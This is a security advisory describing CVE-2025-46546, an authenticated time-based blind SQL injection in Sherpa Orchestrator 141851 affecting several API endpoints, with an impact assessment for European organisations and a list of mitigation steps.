CVE-2025-46546 is a medium-severity SQL Injection vulnerability identified in Sherpa Orchestrator version 141851. The vulnerability arises from improper neutralization of special elements used in SQL commands (CWE-89), specifically allowing multiple time-based blind SQL injection attacks. These injections can be exploited by an authenticated user through various API endpoints related to asset listing, file exports (CSV and XLSX), process listings and exports, robot listings, and task listings and exports. The affected endpoints include /api/gui/asset/list, /api/gui/files/export/csv/, /api/gui/files/list, /api/gui/process/export/csv, /api/gui/process/export/xlsx, /api/gui/process/listAll, /api/gui/processVersion/export/csv/, /api/gui/processVersion/export/xlsx/, /api/gui/processVersion/list/, /api/gui/robot/list/, /api/gui/task/export/csv/, /api/gui/task/export/xlsx/, and /api/gui/task/list/. The time-based blind SQL injection technique allows attackers to infer data from the database by measuring response times, even when direct error messages or data output are not available. Since exploitation requires authentication, the attack surface is limited to users with valid credentials, but once exploited, attackers could potentially extract sensitive information from the backend database, manipulate data integrity, or escalate privileges depending on the database and application context. No public exploits are currently known in the wild, and no patches have been published at the time of this analysis. The vulnerability was reserved and published in late April 2025, with enrichment from CISA indicating recognition of its security relevance.

For European organizations using Sherpa Orchestrator 141851, this vulnerability poses a significant risk to the confidentiality and integrity of their data. Given that Sherpa Orchestrator is likely used for automation and process management, unauthorized access or data extraction via SQL injection could lead to leakage of sensitive operational data, intellectual property, or personal data protected under GDPR. The ability to perform time-based blind SQL injection means attackers can systematically extract database contents without direct feedback, increasing the risk of prolonged undetected data exfiltration. Integrity of process and task data could be compromised, potentially disrupting business workflows or causing erroneous automated actions. Availability impact is less direct but could occur if attackers manipulate database records or cause resource exhaustion through crafted queries. Since exploitation requires authentication, insider threats or compromised user credentials are the primary vectors, emphasizing the importance of strong access controls. The medium severity rating reflects the balance between the need for authentication and the potential for significant data compromise. European organizations in sectors such as manufacturing, logistics, and IT services that rely on Sherpa Orchestrator for automation are particularly at risk, especially if they have not implemented compensating controls or monitoring for anomalous database query patterns.

1. Immediate mitigation should focus on restricting access to Sherpa Orchestrator APIs to only trusted and necessary users, enforcing strong authentication mechanisms such as multi-factor authentication (MFA) to reduce the risk of credential compromise. 2. Implement strict input validation and parameterized queries or prepared statements within the application code to prevent SQL injection; if source code modification is not immediately feasible, consider deploying Web Application Firewalls (WAFs) with custom rules to detect and block time-based blind SQL injection patterns targeting the specified endpoints. 3. Monitor database query logs and application logs for unusual delays or patterns indicative of time-based injection attempts, and establish alerting mechanisms for such anomalies. 4. Conduct a thorough audit of user privileges within Sherpa Orchestrator to ensure the principle of least privilege is enforced, limiting the scope of damage if an account is compromised. 5. Engage with Sherpa vendor support channels to obtain patches or updates addressing this vulnerability as soon as they become available. 6. Consider network segmentation to isolate the Orchestrator system from broader enterprise networks, minimizing lateral movement opportunities. 7. Regularly review and update incident response plans to include scenarios involving SQL injection attacks on critical automation platforms.